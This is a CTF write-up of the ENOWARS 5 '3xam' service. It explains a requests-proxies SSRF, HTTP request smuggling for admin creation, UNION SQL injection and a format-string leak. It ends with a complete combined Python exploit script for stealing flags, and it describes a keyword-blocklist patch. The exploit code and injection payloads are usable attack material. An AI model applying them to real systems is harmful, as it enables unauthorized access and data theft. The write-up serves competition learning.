Saarsec

Schwenk and pwn

ENOWARS 5 - 3xam

3xam is a Python-based service, which has three relevant components (source):

Noise and its public keys

When we look at the source of the backend_internal service, we notice that there are some default user accounts being added. They are added together with public keys, which actually refer to the public keys of the checker (at least for the one with the admin privileges). The public key is extracted from the handshake in backend and always sent along with the request towards backend_internal. The relevant code of the SSR looks as follows:

# backend/app/routes.py, lines 73 following
requestdata = {
    'url': '',
    'headers': {},
    'data': '',
    'method': ''
}
requested_path = '/'
try:
    requestdata.update(json.loads(parsed['data']))
    # b64pubkey comes from the Noise handshake
    requestdata['headers']['X-PubKey'] = b64pubkey
    if requestdata['url'].startswith('/'):
        requestdata['url'] = f"http://backend_internal{requestdata['url']}"

    parsed_url = urlparse(requestdata['url'])
    assert parsed_url.netloc == 'backend_internal', 'Host not allowed'
    assert parsed_url.scheme == 'http', 'Scheme not allowed'
    requested_path = parsed_url.path

    resp = session.request(**requestdata)
    response_data = {
        'status': resp.status_code,
        'data': resp.text,
        'text': resp.text,
        'headers': dict(resp.headers)
    }
except Exception as e:
    logger.error(e)
    response_data = {
        'status': 400 if type(e) is AssertionError else 500,
        'data': str(e),
        'headers': {}
    }

There are a couple of things to note here. First, parsed (line 10) refers to the data that was sent over the Noise-enabled WebSocket. In lines 17 and 18, the service asserts that the URL cannot point to arbitrary servers but must target backend_internal over http. However, line 10 merges our JSON input into requestdata via update, so we can add arbitrary keys to the dictionary. In line 21, these are then unpacked and passed to session.request as keyword arguments.
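To make the problem concrete, here is a minimal sketch of just the dictionary handling, with no network involved. The helper name build_request_kwargs and the attacker_json value are made up for illustration; only the update-then-unpack pattern is taken from the service code above.

```python
import json


def build_request_kwargs(raw_data: str, b64pubkey: str) -> dict:
    """Mimic the dict handling in backend/app/routes.py (sketch, not the real code)."""
    requestdata = {'url': '', 'headers': {}, 'data': '', 'method': ''}
    # update() copies every key from the attacker-supplied JSON, known or not
    requestdata.update(json.loads(raw_data))
    # the header is set after the update, so the attacker cannot overwrite it
    requestdata['headers']['X-PubKey'] = b64pubkey
    return requestdata


# hypothetical attacker input carrying one extra key and a spoofed header
attacker_json = json.dumps({
    'url': '/users',
    'method': 'GET',
    'headers': {'X-PubKey': 'spoofed'},
    'proxies': {'http': 'http://logger:80/'},
})

kwargs = build_request_kwargs(attacker_json, 'real-key-from-handshake')
print(sorted(kwargs))                  # includes the extra 'proxies' key
print(kwargs['headers']['X-PubKey'])   # still the key from the handshake
```

The spoofed header is overwritten, but every other keyword argument of session.request is ours to set.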

Bug 1: proxies

If we pay close attention to the signature of session.request, we note that one of the arguments is called proxies. This can be used to configure proxies to be used by requests (see documentation). It supports HTTP proxies, which you basically talk to almost like a regular HTTP server. So, while we cannot set the hostname of a URL to something other than backend_internal, we can instead use a proxy. So, what can we do with this?
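Before answering that, a quick sketch of why a proxy is "almost like a regular HTTP server" may help. For plain http URLs, a client talking to a proxy sends the full URL in the request line (absolute-form) instead of just the path (origin-form). The function request_line below is a hypothetical helper written for this illustration, and the idea that the receiving server simply routes on the path component is an assumption about the logger, not something taken from its source.

```python
from urllib.parse import urlsplit


def request_line(method: str, url: str, via_proxy: bool) -> str:
    """First line of the HTTP/1.1 request as a client would send it (sketch)."""
    parts = urlsplit(url)
    path = parts.path or '/'
    if parts.query:
        path += '?' + parts.query
    # origin-form for direct connections, absolute-form when talking to a proxy
    target = url if via_proxy else path
    return f"{method} {target} HTTP/1.1"


url = "http://backend_internal/backend_internal"
print(request_line("GET", url, via_proxy=False))
print(request_line("GET", url, via_proxy=True))

# A server that is not actually a proxy may still accept the absolute-form
# target and route on its path (assumption about the logger's behaviour).
print(urlsplit(url).path)
```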

Quick dive into the logger

The logger backend (running on http://logger:80) just has a single relevant endpoint for us: if we get http://logger:80/backend_internal, we will receive all log entries that belong to the backend_internal component. As we could see from looking at the functionality, the gameserver stores a flag through a syshealth feature (it is not too important what this does, because it is just meant to fake some benign functionality and write a flag to the log). Notably, though, if we can get access to the logger, we can read those flags.

The actual exploit

Now that we have a target, let’s build an exploit. We can use the trick with the proxies to provide a URL that passes the checks in lines 17 and 18, but in fact connects to the logger endpoint:

payload = {
  "id": 1,
  "data": json.dumps({
    "url": "http://backend_internal/backend_internal",
    "method": "GET",
    "proxies": {"http": "http://logger:80/"}
  })
}

This gave us a total of 12741 valid flags throughout the entire CTF.

Bug 2: Unintended HTTP Request Smuggling

HTTP Request Smuggling (or HRS for short) is usually an attack in which we are able to confuse front- and back-end servers, such that the front-end only sees one HTTP request, but the back-end sees (at least) two. PortSwigger have a nice explanation on the subject.

Some background

Before we get to the exploit, we need to discuss some basic functionality in the backend_internal service, starting in line 35 of backend_internal/app/resources/user.py:

# backend_internal/app/resources/user.py, lines 35 following
def post(self):
  curr_user = get_current_user()
  args = parser.parse_args()
  user_type_id = models.USER_TYPE_NORMAL
  if curr_user:
    # only admin can add other users and specify their user_type
    require(curr_user.user_type.id == models.USER_TYPE_ADMIN.id,
        401, 'Only admin can add other users')
    if 'user_type_id' in request.json:
      user_type_id = request.json['user_type_id']
    pubkey = request.json['pubkey']
  else:
    pubkey = args['X-PubKey']

  require(pubkey, 400, 'Missing pubkey field')
  require('name' in request.json, 400, 'Missing name field')
  require(request.json['name'], 400, 'Must specify name')
  require(type(request.json['name']) is str, 400, 'Name must be string')

  u = models.User(
        name=request.json['name'],
        user_type=user_type_id,
        pubkey=pubkey)
  require(u.save(), 500, 'Failed to save user')

Note that in line 3 of the snippet get_current_user is called. This uses the X-PubKey header to get the current user’s public key and searches the database for a user with that key. If none is found (e.g., because we have not yet registered), a user is generated with that public key (line 14) and the default privileges, namely USER_TYPE_NORMAL (line 5).

If we want to add another user, we need to be of type USER_TYPE_ADMIN (line 8). However, by default, only the gameserver checker knows the necessary key pair. If we somehow could manage to produce a request to this endpoint with the gameserver’s X-PubKey, this would enable us to add arbitrary users with arbitrary types. Notably, a user with USER_TYPE_ADMIN has three important capabilities: they can directly use admin functionality to get the logs (which we already exploited through the proxies), they can see the information (including the name) of arbitrary users (regular users can only see usernames for “normal” users), and they can see the provided answers to questions in the exams. So, if we can become admin, we can actually exploit all three flag stores at the same time.

The “authentication” in this service is done only with the public key used in the Noise protocol. In line 12 of the code at the beginning of this post, we can see that the public key is set after our input is parsed, i.e., we cannot overwrite X-PubKey with something of our choice. However, if we somehow manage to smuggle a second request, this is entirely controlled by us. Together with the functionality of registering users with arbitrary privileges (if only we have the correct X-PubKey set), we can now exploit this.

The actual exploit

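There are usually two ways in which HTTP servers know how long a request is: the Content-Length field indicates how many bytes should be read, and, alternatively, Transfer-Encoding: chunked means that we send chunked data. This basically works as follows: the body is sent as a series of chunks, each prefixed by its size in hexadecimal and a CRLF, and a chunk of size 0 ends the body.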
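As a small illustration of the chunked wire format, here is a sketch of an encoder. The function name encode_chunked is made up for this example; trailers and chunk extensions are left out on purpose.

```python
def encode_chunked(chunks):
    """Encode an iterable of byte strings as an HTTP/1.1 chunked body."""
    out = bytearray()
    for chunk in chunks:
        if not chunk:
            continue  # an empty chunk would terminate the body early
        # size in hex, CRLF, the data itself, CRLF
        out += f"{len(chunk):x}\r\n".encode() + chunk + b"\r\n"
    out += b"0\r\n\r\n"  # zero-length chunk marks the end of the body
    return bytes(out)


body = encode_chunked([b"hello", b"world!"])
print(body)  # b'5\r\nhello\r\n6\r\nworld!\r\n0\r\n\r\n'
```

Note that an empty body is just the terminator 0\r\n\r\n, which is exactly the prefix used in the payload further down.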

The HTTP standard mandates that if Transfer-Encoding: chunked is present, the server must disregard Content-Length. So, all we need to do (remember: we control basically everything sent through session.request in line 21) is to prepare a request which will be interpreted as two requests by backend_internal. Our payload for that is pretty straightforward:

username = randomstring(10)

inner_payload = json.dumps({"pubkey": our_pubkey.decode(), "name": username,
                            "user_type_id": 1})
inner_length = len(inner_payload)
payload = {
  "id": 1,
  "data": json.dumps({
    "url": f"/users",
    "method": "GET",
    "headers": {"Transfer-Encoding": "chunked", "Connection": "Keep-Alive"},
    "data": f"0\r\n\r\nPOST /users HTTP/1.1\r\n"
            f"X-PubKey: cBjEl+JgQG9tsngU3ieItjg360I8VSkB+YOUbp3A3yY=\r\n"
            f"Host: backend_internal\r\n"
            f"Content-Length: {inner_length}\r\n"
            f"Content-Type: application/json\r\n\r\n" +
            inner_payload
    })
}

In essence, we first make a GET request to the /users endpoint. We do not really care about the result of that, because our goal is merely to smuggle the second request. The data being sent to backend_internal looks something like this:

GET /users HTTP/1.1
Host: backend_internal
Transfer-Encoding: chunked
Connection: Keep-Alive
X-PubKey: <our_pubkey>
Content-Length: <howeverLongTheTotalRequestIs>

0

POST /users HTTP/1.1
X-PubKey: cBjEl+JgQG9tsngU3ieItjg360I8VSkB+YOUbp3A3yY=
Host: backend_internal
Content-Length: <inner_length>
Content-Type: application/json

{"pubkey": <our_pubkey>, "name": <random_user>, "user_type_id": 1}

The backend_internal observes the first request, ignores the Content-Length (since we have chunked encoding) and parses the empty chunk. Since we explicitly tell it to keep the connection open (Connection: Keep-Alive), it now parses the remaining data, which is our smuggled request. While we cannot see the result of this request, we don’t care because the state-changing action has taken place and our account is now an admin user.
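The following sketch shows how a keep-alive server that prefers chunked encoding over Content-Length would carve the byte stream above into two requests. It is a toy parser written for this post (split_requests, the placeholder keys, and the shortened JSON body are all made up), not the parser that backend_internal actually uses, and it ignores trailers.

```python
def split_requests(stream: bytes):
    """Split a byte stream into (request line, body) pairs (toy parser)."""
    requests = []
    while stream:
        head, _, rest = stream.partition(b"\r\n\r\n")
        lines = head.split(b"\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        if headers.get(b"transfer-encoding", b"").lower() == b"chunked":
            # chunked wins over Content-Length: read chunks until size 0
            body = b""
            while True:
                size_line, _, rest = rest.partition(b"\r\n")
                size = int(size_line, 16)
                if size == 0:
                    rest = rest[2:]  # skip the final CRLF (no trailers assumed)
                    break
                body += rest[:size]
                rest = rest[size + 2:]  # skip chunk data and its CRLF
        else:
            length = int(headers.get(b"content-length", b"0"))
            body, rest = rest[:length], rest[length:]
        requests.append((lines[0].decode(), body))
        stream = rest  # whatever is left is treated as the next request
    return requests


inner = b'{"name": "x"}'
smuggled = (b"POST /users HTTP/1.1\r\nX-PubKey: admin-key\r\n"
            b"Host: backend_internal\r\n"
            b"Content-Length: " + str(len(inner)).encode() + b"\r\n"
            b"Content-Type: application/json\r\n\r\n" + inner)
outer_body = b"0\r\n\r\n" + smuggled
stream = (b"GET /users HTTP/1.1\r\nHost: backend_internal\r\n"
          b"Transfer-Encoding: chunked\r\nConnection: Keep-Alive\r\n"
          b"X-PubKey: our-key\r\n"
          b"Content-Length: " + str(len(outer_body)).encode() + b"\r\n\r\n"
          + outer_body)

for request_line, body in split_requests(stream):
    print(request_line, body)
```

A parser that honoured Content-Length instead would have consumed everything as the body of the GET request, which is exactly the disagreement the smuggling relies on.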

With this, we can now access /questions/1 to see all answers (aka flags), use /users/<id> to learn the names of all users (aka flags), and also access the admin log backend /admin/logs?tag=/app/resources/admin/syshealth&match=ENO in the following couple of requests :-)

According to the organizers, this was unintended, but it still allowed us to get first blood on all flag stores (basically at the same time).

Bug 3: SQL injection in scores

Full disclosure: I did not find this myself, but saw an attack against us. I pimped the exploit to steal flags from two stores, though ;-)

The entire database management is done through a custom ORM (backend_internal/app/orm/model.py). Rather than using prepared statements or the like, the service uses string formatting to build up the query. In backend_internal/app/resources/scores.py, there is attacker-controlled input in the count parameter. The relevant lines of code are as follows:

# backend_internal/app/resources/score.py
def get(self, exam_id):
   exam = models.Exam.get(id=exam_id)
   require(exam, 404)
   total_scores = models.Score.count(exam=exam)
   count = request.args.get('count') or self.PAGE_SIZE
   offset = request.args.get('offset') or 0

   output = {'exam': exam.to_dict()}
   scores = [s.to_dict() for s in models.Score.find(offset=offset,
      limit=count, exam=exam, order=1)]

   for s in scores:
      s['user'] = {'name': models.User.get(id=s['user_id']).name}

   output['scores'] = scores
   output['scores_count'] = total_scores

   return output

# backend_internal/app/orm/model.py
def find(cls, fields=None, offset=0, limit=None, order=0, **kwargs):
   q_chunks = ('SELECT * FROM (',)
   q_chunks += ('SELECT {fields}',)
   q_chunks += ('FROM {tablename}',)
   q_chunks += ('WHERE id > 0', )
   q_chunks += ('AND ({conds})',)

   if order == cls.ORDER_DESC:
      q_chunks += ('ORDER BY id DESC',)

   if not limit:
      limit = 200
   elif limit == -1:
      limit = None

   if limit:
      q_chunks += ('LIMIT {offset},{limit}', )
   q_chunks += (')x',)

   q = ' '.join(q_chunks)

As we can see in line 10, models.Score.find is invoked with limit=count, where count originates from the GET parameter count (line 6). Since this is just used in string formatting (not a prepared statement), we can inject a UNION SELECT into the statement. The original attack against us looked something like this:

/exams/1/scores?count=123)x+UNiON+SeLECT+NULL,+id,+NULL,+100+from+users+whEre+user_type_id=2+%23

The resulting query looked as follows:

SELECT * FROM (SELECT id, user_id, exam_id, score FROM scores WHERE id > 0 AND exam_id = 1 LIMIT 0,123)x UNION SELECT NULL, id, NULL, 100 FROM users WHERE user_type_id=2 # ... some more stuff commented out

Importantly, the result of this query is not just output, but instead passed through Python once more in lines 13 and 14 of the above listing. This snippet takes the user_id coming from the database query and then “resolves” the username. Since the query above returns all user names of user_type_id 2, this yields all flags added by the gameserver for that flag store.
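To see the injection without a database, here is a sketch that string-formats a query the same way and contrasts it with one possible fix. TEMPLATE is a simplified stand-in modelled on the chunks in find, and parse_count with its default and maximum values is a hypothetical helper, not the patch we deployed.

```python
# Hypothetical, simplified template modelled on the chunks in find()
TEMPLATE = ("SELECT * FROM (SELECT {fields} FROM {tablename} "
            "WHERE id > 0 AND ({conds}) LIMIT {offset},{limit} )x")


def build_query(limit, offset=0):
    """String-format the query like the custom ORM does (sketch)."""
    return TEMPLATE.format(fields="id, user_id, exam_id, score",
                           tablename="scores", conds="exam_id = 1",
                           offset=offset, limit=limit)


def parse_count(raw, default=20, maximum=200):
    """One possible fix: accept only a bounded, non-negative integer."""
    if raw is None:
        return default
    value = int(raw)  # raises ValueError for anything that is not a number
    if not 0 <= value <= maximum:
        raise ValueError("count out of range")
    return value


injected = "123)x UNION SELECT NULL, id, NULL, 100 FROM users WHERE user_type_id=2 #"
print(build_query(injected))  # the UNION ends up outside the subquery

try:
    parse_count(injected)
except ValueError as exc:
    print("rejected:", exc)
```

Converting count and offset to integers before they reach the ORM would be enough to stop this particular injection, even without touching the query builder.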

The added benefit of the SQL injection is that we can actually exploit it to also get the flags from the answers (which I have not observed being used against us). Specifically, as long as we select a valid user ID, the above shown Python code does not throw an error. At the end of the get function, we receive the list of users and their scores. The score, however, is not checked to be of type integer. Hence, we can expand the exploit and also do the following UNION SELECT:

UNION SELECT NULL, 1, NULL, VALUE from answers

Note that the last field is the score, which is output. We just always select user_id as 1, since this is the admin account we know of. So, the output of the request then contains a lot of entries for the user admin, every time with a different flag from the answers as the score.

Bug 4: Format string

The final (?) bug is of yet another type, namely a format string. When submitting an answer to a question, we get feedback from the service whether our answer was correct or not. This happens in backend_internal/app/resources/exam_questions.py. The notable part of the functionality is shown below:

# defined at the top of the file
MESSAGE_SUBMISSION = 'Your answer: {submission.value} {message}'
MESSAGE_SUBMISSION_CORRECT = 'is correct. {submission.points} points earned'
MESSAGE_SUBMISSION_INCORRECT = 'is wrong. Lost {submission.points} points :('
# ....
# kill xss and sql injections
submission.value = strip(data['answer'], ' <>+-%{}[].!@#$%^&*()|\'"`~,;\r\n')
submission.points = question.points
submission.user = user
submission.question = question

# prep osd message
success_message = MESSAGE_SUBMISSION.format(message=MESSAGE_SUBMISSION_CORRECT,
        submission=submission)
fail_message = MESSAGE_SUBMISSION.format(message=MESSAGE_SUBMISSION_INCORRECT,
        submission=submission)
# ....
result = {
  'osd': {
    'type': 'success' if correct_answer else 'error',
    'message': osd_message.format(submission=submission)
  }
}

We see that our answer (line 7) is seemingly sanitized and then used in generation of success_message and fail_message. Depending on whether our answer was correct, the osd_message variable is assigned to either one of them. Notably, we have an invocation of formatting twice. That means, if we can put something like {submission} into the osd_message used in line 21, this will be resolved by Python when formatting the message. However, as line 7 shows, our data is sanitized and all relevant chars are stripped, right?

Well, no :-) While Python has a built-in strip method on strings, the strip used here is actually a custom function:

def strip(string, chars, strip_all=True):
  for c in chars:
    string = string.replace(c, '', strip_all)
  return string

This invokes string.replace with the third parameter set to True. Unfortunately, the third parameter of replace is the maximum number of replacements, and True translates to 1, i.e., this replaces the first occurrence of each of the dangerous characters… but that is it. Because the custom ORM links objects to each other in some odd ways, we can just ask the service to format {submission.question.answers} to retrieve all answers for a particular question. Since the gameserver always answers question 1, we just have to provide a wrong answer to the first question and send {}.{submission.question.answers}. The first occurrences of the three “dangerous” characters we need are stripped, so we are left with our desired format string. In yet another full disclosure, I found this bug an hour before the end of the CTF, but managed to overcomplicate things (attempting to import os as you would in a template injection). The service author let us know after the CTF how easy it actually was :-(
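The whole chain can be reproduced offline with a few lines. In this sketch, strip and the message templates are copied from the snippets above, while the Question and Submission classes and the ENO_fake_flag value are hypothetical stand-ins for the ORM objects and a real flag.

```python
DANGEROUS = ' <>+-%{}[].!@#$%^&*()|\'"`~,;\r\n'


def strip(string, chars, strip_all=True):
    # same logic as the service: True is passed as replace()'s count, i.e. 1
    for c in chars:
        string = string.replace(c, '', strip_all)
    return string


class Question:  # hypothetical stand-in for the ORM object
    def __init__(self, answers):
        self.answers = answers


class Submission:  # hypothetical stand-in for the ORM object
    def __init__(self, value, points, question):
        self.value, self.points, self.question = value, points, question


def encode_payload(payload):
    # prepend one sacrificial copy of every dangerous character we need
    required = set(DANGEROUS) & set(payload)
    return ''.join(required) + payload


wanted = '{submission.question.answers}'
sub = Submission(strip(encode_payload(wanted), DANGEROUS), 5,
                 Question(['ENO_fake_flag']))

# first format: our value is inserted verbatim, braces and all
first = 'Your answer: {submission.value} {message}'.format(
    message='is wrong. Lost {submission.points} points :(', submission=sub)
# second format: the braces we smuggled in are now interpreted
second = first.format(submission=sub)
print(first)
print(second)
```

The first print still shows the literal placeholder, the second one shows the list of answers in its place.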

Summary, Patches, and shitload of boilerplate code

Really fun service, for which we got first blood on all stores because of the unintended HRS flaw. I did not actually modify any of the functionality of backend_internal. Instead, I just made sure that backend would not even handle requests which carry keywords like proxies, union, or chunked :-)
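For illustration, a keyword filter of that kind could look roughly like the sketch below. This is a reconstruction under assumptions, not the patch we actually ran: the function name is_blocked and the exact keyword list are made up, based only on the three keywords mentioned above.

```python
BLOCKED_KEYWORDS = ("proxies", "union", "chunked")


def is_blocked(raw_request: str) -> bool:
    """Return True if the raw request data contains a blocked keyword."""
    lowered = raw_request.lower()  # catches mixed case such as 'UNiON'
    return any(keyword in lowered for keyword in BLOCKED_KEYWORDS)


print(is_blocked('{"url": "/users", "method": "GET"}'))
print(is_blocked('{"url": "/exams/1/scores?count=1)x+UNiON+SeLECT+NULL"}'))
print(is_blocked('{"url": "/users", "proxies": {"http": "http://logger:80/"}}'))
```

A blocklist like this is quick to deploy during a CTF, but it does nothing against the format string bug and can reject legitimate requests that happen to contain one of the words.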

All exploits combined

Here is a Python file with all the boilerplate code, which is frankenstein’ed together, so no guarantee it actually works ;-)

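import asyncio
import base64
import json
import random
import string
import sys

import websockets
from dissononce.extras.meta.protocol.factory import NoiseProtocolFactory
from dissononce.processing.handshakepatterns.interactive.XX import XXHandshakePattern
from dissononce.dh.x25519.x25519 import X25519DH


def randomstring(length):
    # helper that was missing from the original listing (assumed implementation)
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))


async def communicate(target):
    uri = f"ws://{target}:8221/noise"

    async with websockets.connect(uri) as ws:

        keypair = X25519DH().generate_keypair()
        # assumption: our_pubkey is the base64 of our static Noise public key,
        # matching the X-PubKey value that backend derives from the handshake
        our_pubkey = base64.b64encode(keypair.public.data)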
        protocol = NoiseProtocolFactory().get_noise_protocol('Noise_XX_25519_AESGCM_SHA256')

        handshakestate = protocol.create_handshakestate()
        handshakestate.initialize(XXHandshakePattern(), True, b'', s=keypair)

        message_buffer = bytearray()
        handshakestate.write_message(b'', message_buffer)
        await ws.send(message_buffer)

        incoming = await ws.recv()
        message_buffer = bytearray()
        handshakestate.read_message(bytes(incoming), bytearray())

        my_cipherstates = handshakestate.write_message(b'', message_buffer)
        await ws.send(message_buffer)

        async def send_and_recv(payload):
            ciphertext = my_cipherstates[0].encrypt_with_ad(b'', json.dumps(payload).encode())
            await ws.send(ciphertext)
            incoming = await ws.recv()

            return json.loads(json.loads(my_cipherstates[1].decrypt_with_ad(b'', incoming))["data"])
        # Exploit 1, Proxies
        payload = {
            "id": 1,
            "data": json.dumps({
                "url": "http://backend_internal/backend_internal",
                "method": "GET",
                "proxies": {"http": "http://logger:80/"}
            })
        }
        data = await send_and_recv(payload)
        print(data)

        # Exploit 2, add admin user, then enumerate users
        username = randomstring(10)


        inner_payload = json.dumps({"pubkey": our_pubkey.decode(), "name": username,
                                    "user_type_id": 1})
        inner_length = len(inner_payload)
        payload = {
            "id": 1,

            "data": json.dumps({
                "url": f"/users",
                "method": "GET",
                "headers": {"Transfer-Encoding": "chunked", "Connection": "Keep-Alive"},
                "data": f"0\r\n\r\nPOST /users HTTP/1.1\r\n"
                        f"X-PubKey: cBjEl+JgQG9tsngU3ieItjg360I8VSkB+YOUbp3A3yY=\r\n"
                        f"Host: backend_internal\r\n"
                        f"Content-Length: {inner_length}\r\n"
                        f"Content-Type: application/json\r\n\r\n" +
                        inner_payload
            })
        }
        data = await send_and_recv(payload)
        payload = {
            "id": 1,

            "data": json.dumps({
                "url": f"/exams/1/scores",
                "method": "GET",
            })
        }
        data = await send_and_recv(payload)
        data = json.loads(data["data"])
        highest_score = max([score["user_id"] for score in data["scores"]])
        for i in range(highest_score + 10, highest_score - 50, -1):
            payload = {
                "id": 1,
                "data": json.dumps({
                    "url": f"/users/{i}",
                    "method": "GET",
                })
            }
            data2 = await send_and_recv(payload)
            try:
                print(json.loads(data2["data"])["user"]["name"])
            except (KeyError, TypeError, ValueError):
                # no such user, or the response was not the JSON we expected
                pass
        # Exploit 2b, get answers
        payload = {
            "id": 1,
            "data": json.dumps({
                "url": f"/questions/1",
                "method": "GET",
            })
        }
        data = await send_and_recv(payload)
        print(data)

        # Exploit 2c, admin backend
        payload = {
            "id": 1,
            "data": json.dumps({
                "url": f"/admin/logs?tag=/app/resources/admin/syshealth&match=ENO",
                "method": "GET",
            })
        }
        data = await send_and_recv(payload)
        print(data)

        # Exploit 3, SQLi
        payload = {
            "id": 1,

            "data": json.dumps({
                "url": f"http://backend_internal/exams/1/scores?count=1)x+UNiON+SeLECT+NULL,+id,+NULL,+100+from+users+whEre+user_type_id=2+%23",
                "method": "GET",
            })
        }
        data = await send_and_recv(payload)
        print(data)
        
        payload = {
            "id": 1,

            "data": json.dumps({
                "url": f"http://backend_internal/exams/1/scores?count=1)x+UNiON+SeLECT+NULL,+1,+NULL,+value+from+answers%23",
                "method": "GET",
            })
        }
        data = await send_and_recv(payload)
        print(data)      
        

        # Exploit 4, Format String 
        payload = {
            "id": 1,
            "data": json.dumps({
                "url": "/users",
                "method": "POST",
                "data": json.dumps({'name': randomstring(10)}),
                "headers": {"Content-Type": "application/json"}
            })
        }
        await send_and_recv(payload)
        payload = {
            "id": 1,

            "data": json.dumps({
                "url": "/exams/1",
                "method": "POST",
            })
        }
        data = await send_and_recv(payload)
        data = json.loads(data["data"])
        next_q = data["next_question_hash"]

        def encode_payload(payload):
            required = set(' <>+-%{}[].!@#$%^&*()|\'"`~,;\r\n') & set(payload)
            return "".join(required) + payload

        actual_payload = "{submission.question.answers}" # ('os').popen('yourpayloadhere').read()} foo __globals__"

        payload = {
            "id": 1,
            "data": json.dumps({
                "url": f"/exams/1/{next_q}",
                "method": "POST",
                "data": json.dumps({"answer": encode_payload(actual_payload)}),
                "headers": {"Content-Type": "application/json"}
            })
        }

        data = await send_and_recv(payload)
        print(data)

if __name__ == "__main__":
    asyncio.run(communicate(sys.argv[1]))